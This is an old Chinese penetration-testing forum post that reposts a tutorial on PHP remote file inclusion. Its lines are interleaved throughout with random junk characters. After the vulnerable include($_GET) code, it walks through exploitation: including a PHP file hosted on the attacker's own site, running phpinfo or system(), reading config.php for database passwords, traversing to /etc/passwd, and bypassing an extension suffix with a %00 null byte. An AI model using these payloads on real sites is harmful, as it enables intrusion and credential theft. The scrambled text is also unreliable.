中国网络渗透测试联盟

标题: PHP远程包含 [打印本页]
作者: admin    时间: 2012-9-15 14:06
标题: PHP远程包含

  c) k, W& C6 n8 s: fphp远端档包含漏洞基本
# P+ h6 C: @  Z, H' x' A这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。5 ^7 @. u+ M# p/ @! f
本帖隐藏的内容需要回复才可以浏览: k3 J6 Q) E* @8 _4 U- ~3 _
首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。: [! U( z: \* F. s) w
1.找出bug:5 s* O5 j2 z+ V( t0 s( Z
为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:
; D' M2 g1 y+ h* a, t6 d如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。: t) X9 e9 h& c2 x1 ^4 c0 B
我们先看这个,当用户输入通过后就包含档,也就是; T: U( a. V* x1 x" T6 j4 Z7 y6 ~
if ($_GET) {5 c8 N: I3 C$ X, C4 [' p4 s
include $_GET;
; ?0 p! ~7 v/ l  |  U( t} else {
! {' t" v/ C" r! W3 iinclude "home.php";
& i) c+ ~4 c, ^}
) q1 p% U- f9 s' Q, W- b5 T& z这种结构在动态网站里是常见的,问题是它允许这样http://www.target.com /explame.php?page=main.php或者http://www.target.com/explame.php? page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。6 S( c+ |  [2 q8 @& S. {& z8 ^. n
2.测试
% S: M5 y9 S& O% Y( t这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的7 i$ L8 w9 k- W" Q
http://www.target.com/explame.php?page=zizzy
: F6 t. ]" r+ d) B4 t. {Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3
, C3 f/ E% c0 A# EWarning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3
8 A3 f; M4 h( }0 p+ Ophp输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。
2 K+ N; ]( G. n3.利用( t0 G3 Y) Q- l- [! C
php确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上http://www.mysite.com/yeah.txt.内容这样& t, o0 g# z7 w
<?: P, e8 C; y; G0 }5 y- m9 C
echo "Wow,test!";
2 ?" o- Y& \. K3 V% A?>
" i7 E3 f1 R3 g* m, b$ c0 e9 T那么http://www.target.com/explame.php?pa...e.com/yeah.txt
8 d* y- q1 P6 h( W9 gOK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。
) h. y$ Y0 {8 T/ T. G' s4.另一种
+ d8 Y/ X$ o: t' V/ C: |9 T( C有时程式师换种写法,写成这样,限制了包含范围
0 q* j5 W9 o' S% [1 Iif ($_GET) {1 B* {" Z4 M" C
include "$_GET.php";' E# h2 Z1 e; ^
} else {4 I" r6 T$ D" I3 d: w; L& z
include "home.php";. Z: r) M4 P4 ]% j  o* W4 |
}7 G  U& h$ w) f9 ~4 V  ?1 R4 E
我们提交http://www.target.com/explame.php?pa...e.com/yeah.txt
2 w; x# |! ?* {Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3* W) {" x9 B2 \# @
Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 35 c' i0 c4 `) p5 X4 k
包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
: K1 H; i: Q, Q/ T! r0 F, K: X那passwd怎么办
/ Y+ _- N( n7 u5 ~, I/ m6 A  W  JWarning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 3
' q4 J6 J7 q$ Q4 E2 ~$ nWarning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3
% y. t7 N' e6 S: @# n在这里使用个NUL字元,也就是%00来跳过检测: O/ n0 ?# b9 v- _% L4 A; R
http://www.target.com/explame.php?pa.../etc/passwd%00
% K" u: }8 _5 O) n0 Y: m! t



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2